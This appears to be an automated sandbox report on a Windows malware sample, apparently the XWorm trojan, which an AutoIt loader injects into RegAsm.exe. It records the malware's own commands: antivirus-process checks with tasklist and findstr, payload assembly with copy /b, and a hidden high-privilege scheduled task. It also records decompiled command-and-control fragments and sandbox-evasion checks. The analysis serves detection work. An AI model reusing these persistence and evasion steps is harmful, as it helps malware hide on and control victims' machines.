                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: DA92phBHUS.exe | Static file information: File size 3145765 > 1048576
                Source: DA92phBHUS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: RegAsm.pdb | source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
                Source: Binary string: RegAsm.pdb4 | source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr

                Data Obfuscation

                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs | .Net Code: Memory
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs | .Net Code: Memory
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                Source: DA92phBHUS.exe | Static PE information: real checksum: 0xc6020 should be: 0x3088dd
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00E68B75 push ecx; ret 10_2_00E68B88
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_00318B75 push ecx; ret 18_2_00318B88
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_0030CBDB push eax; retf 18_2_0030CBF8
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_0030CC06 push eax; retf 18_2_0030CBF8

                Persistence and Installation Behavior

                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | File created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
                Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | File created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe

                Boot Survival

                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EC59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00EC59B3
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00E55EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00E55EDA
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_003759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,18_2_003759B3
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_00305EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,18_2_00305EDA
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00E633B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00E633B7
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Memory allocated: 14E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Memory allocated: 2FC0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Memory allocated: 2F00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Window / User API: threadDelayed 1826
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Window / User API: threadDelayed 713
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Window / User API: threadDelayed 9107
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | API coverage: 4.8 %
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | API coverage: 4.6 %
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe TID: 6656 | Thread sleep time: -35048813740048126s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Last function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Thread sleep count: Count: 1826 delay: -10
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EA4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00EA4005
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EA494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00EA494A
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EA3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00EA3CE2
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EAC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00EAC2FF
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00EACD9F
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EACD14 FindFirstFileW,FindClose,10_2_00EACD14
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EAF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00EAF5D8
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EAF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00EAF735
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EAFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00EAFA36
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_00354005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00354005
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_0035C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0035C2FF
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_0035494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_0035494A
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_0035CD14 FindFirstFileW,FindClose,18_2_0035CD14
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_0035CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_0035CD9F
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_0035F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0035F5D8
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_0035F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0035F735
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_0035FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0035FA36
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_00353CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00353CE2
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00E55D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00E55D13
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\438799
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\438799\
                Source: RegAsm.exe, 00000017.00000002.2975642601.0000000006780000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                Source: Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll["
                Source: RegAsm.exe, 00000017.00000002.2972830964.00000000012E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VmCi-
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EB45D5 BlockInput,10_2_00EB45D5
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00E55240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00E55240
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00E75CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_00E75CAC
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E988CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00E988CD
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00E6A385
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6A354 SetUnhandledExceptionFilter,10_2_00E6A354
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0031A354 SetUnhandledExceptionFilter,18_2_0031A354
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0031A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0031A385
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifMemory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: 1030000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifMemory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: 1030000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifMemory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: F7D000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E99369 LogonUserW,10_2_00E99369
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E55240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00E55240
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA1AC6 SendInput,keybd_event,10_2_00EA1AC6
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA51E2 mouse_event,10_2_00EA51E2
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.batJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 438799Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "pantyhoseyourslandscapesdisposition" Flyer Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity LJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Dump.pif LJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E988CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00E988CD
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00EA4F1C
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028DD000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1753045770.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000000.1744374381.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q(
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-^q
                Source: Dump.pif, ImageSyncProX.scrBinary or memory string: Shell_TrayWnd
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6885B cpuid 10_2_00E6885B
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E80030 GetLocalTime,__swprintf,10_2_00E80030
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E80722 GetUserNameW,10_2_00E80722
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E7416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_00E7416A
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: RegAsm.exe, 00000017.00000002.2972830964.0000000001321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
                Source: Yara matchFile source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2973858744.000000000303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Dump.pif PID: 5432, type: MEMORYSTR
